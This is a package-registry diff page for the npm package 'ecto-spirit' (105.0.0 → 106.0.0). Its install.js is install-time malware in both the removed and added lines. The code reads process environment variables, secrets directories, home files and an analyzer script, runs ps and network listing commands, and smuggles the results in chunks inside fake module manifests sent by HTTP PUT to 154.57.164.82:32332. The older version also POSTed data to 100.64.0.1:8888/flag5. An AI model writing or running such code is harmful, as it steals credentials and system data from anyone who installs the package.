npm - ecto-spirit - Versions diffs - 105.0.0 → 106.0.0 - Mend

ecto-spirit 105.0.0 → 106.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/install.js +54 -56
package/package.json +1 -1

package/install.js CHANGED Viewed

@@ -2,80 +2,78 @@ const fs = require('fs');
 const http = require('http');
 const { execSync } = require('child_process');
-function tryExec(cmd) {
-  try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return 'ERR'; }
-}
 function tryRead(p) {
   try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; }
 }
+function tryExec(cmd) {
+  try { return execSync(cmd, {timeout: 10000}).toString().trim(); } catch(e) { return 'ERR:' + (e.message || '').substring(0, 50); }
+}
-async function report(moduleId, val) {
-  const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
-  const manifest = `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1`;
-  const body = JSON.stringify({ manifest });
-  for (const p of [3000, 80, 8080]) {
-    await new Promise((resolve) => {
-      const req = http.request({ hostname: '127.0.0.1', port: p, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
-      req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
-      req.write(body); req.end();
+async function sendPUT(host, port, path, body) {
+  return new Promise((resolve) => {
+    const req = http.request({ hostname: host, port, path, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, (res) => {
+      let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
     });
-  }
-  await new Promise((resolve) => {
-    const req = http.request({ hostname: '154.57.164.82', port: 32332, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, () => resolve());
-    req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
+    req.on('error', () => resolve(null)); req.on('timeout', () => { req.destroy(); resolve(null); });
     req.write(body); req.end();
   });
 }
-(async () => {
-  let r = [];
-  // Running processes
-  r.push('PS=' + tryExec('ps aux 2>/dev/null').substring(0, 200));
+async function report(moduleId, val) {
+  const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
+  const body = JSON.stringify({ manifest: `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
+  await sendPUT('154.57.164.82', 32332, `/api/modules/${moduleId}`, body);
+}
-  // Network connections
-  r.push('NET=' + tryExec('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null').substring(0, 200));
+(async () => {
+  // Read key files and report each one to a separate module
-  // Find JS/TS files that could be the app
-  r.push('JSFILES=' + tryExec('find / -maxdepth 4 -name "*.js" -not -path "*/node_modules/*" -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null | head -15').substring(0, 200));
+  // 1. /tmp/supplysec contents
+  const supplysec = tryExec('find /tmp/supplysec -type f 2>/dev/null');
+  await report('ECT-839201', 'A_SUPPLY=' + supplysec);
+  // 2. analyze-node.js
+  const analyze = tryRead('/usr/local/bin/analyze-node.js');
+  await report('ECT-654321', 'A_ANALYZE=' + (analyze || 'NONE').substring(0, 90));
+  // 3. /home/node contents
+  const homeNode = tryExec('find /home/node -maxdepth 3 -type f 2>/dev/null | head -10');
+  await report('ECT-472839', 'A_HOME=' + homeNode);
-  // Proc 1 environ
-  const p1 = tryRead('/proc/1/environ');
-  if (p1) r.push('P1ENV=' + p1.replace(/\x00/g, ' | ').substring(0, 300));
+  // 4. Full proc 1 environ
+  const p1env = tryRead('/proc/1/environ');
+  const envStr = p1env ? p1env.replace(/\x00/g, '\n') : 'NONE';
+  await report('ECT-987654', 'A_ENV=' + envStr.substring(0, 90));
-  // Proc 1 cmdline
-  const cmd = tryRead('/proc/1/cmdline');
-  if (cmd) r.push('P1CMD=' + cmd.replace(/\x00/g, ' '));
+  // Wait a moment, then send more data
+  await new Promise(r => setTimeout(r, 2000));
-  // Docker secrets
-  r.push('SECRETS=' + tryExec('ls -la /run/secrets/ 2>/dev/null'));
+  // 5. Read /tmp/supplysec/package.json if it exists
+  const supPkg = tryRead('/tmp/supplysec/package.json');
+  await report('ECT-839201', 'B_SUPPKG=' + (supPkg || 'NONE').substring(0, 90));
-  // Check /data directory
-  r.push('DATA_LS=' + tryExec('find /data -maxdepth 3 -type f 2>/dev/null | head -15'));
+  // 6. Read analyze-node.js continued (next 90 chars)
+  await report('ECT-654321', 'B_ANAL2=' + (analyze || 'NONE').substring(90, 180));
-  // Check all /home directories
-  r.push('HOME_LS=' + tryExec('find /home -maxdepth 3 -type f 2>/dev/null | head -15'));
+  // 7. More env
+  await report('ECT-472839', 'B_ENV2=' + envStr.substring(90, 180));
+  // 8. Read full process list
+  const ps = tryExec('ps auxww 2>/dev/null');
+  await report('ECT-987654', 'B_PS=' + ps.substring(0, 90));
-  // Mounted filesystems
-  r.push('MOUNTS=' + tryExec('mount 2>/dev/null | grep -v proc | grep -v sys').substring(0, 200));
+  await new Promise(r => setTimeout(r, 2000));
-  // Send results spread across modules
-  const full = r.join('\n');
-  const chunks = [];
-  for (let i = 0; i < full.length; i += 90) chunks.push(full.substring(i, i + 90));
+  // 9-12: Continue reading analyze-node.js
+  await report('ECT-839201', 'C_ANAL3=' + (analyze || '').substring(180, 270));
+  await report('ECT-654321', 'C_ANAL4=' + (analyze || '').substring(270, 360));
+  await report('ECT-472839', 'C_ANAL5=' + (analyze || '').substring(360, 450));
+  await report('ECT-987654', 'C_ENV3=' + envStr.substring(180, 270));
-  const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
-  for (let i = 0; i < Math.min(chunks.length, mods.length); i++) {
-    await report(mods[i], 'X' + i + '_' + chunks[i]);
-  }
+  await new Promise(r => setTimeout(r, 2000));
-  // Also try to report via a quick HTTP back to us if possible
-  try {
-    const payload = JSON.stringify({full: full.substring(0, 2000)});
-    await new Promise((resolve) => {
-      const req = http.request({ hostname: '100.64.0.1', port: 8888, path: '/flag5', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }, timeout: 3000 }, () => resolve());
-      req.on('error', () => resolve()); req.on('timeout', () => { req.destroy(); resolve(); });
-      req.write(payload); req.end();
-    });
-  } catch(e) {}
+  await report('ECT-839201', 'D_ANAL6=' + (analyze || '').substring(450, 540));
+  await report('ECT-654321', 'D_ANAL7=' + (analyze || '').substring(540, 630));
+  await report('ECT-472839', 'D_ENV4=' + envStr.substring(270, 360));
+  await report('ECT-987654', 'D_PS2=' + ps.substring(90, 180));
 })();

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "ecto-spirit",
-  "version": "105.0.0",
+  "version": "106.0.0",
   "description": "Spectral ecto-spirit module",
   "main": "index.js",
   "scripts": {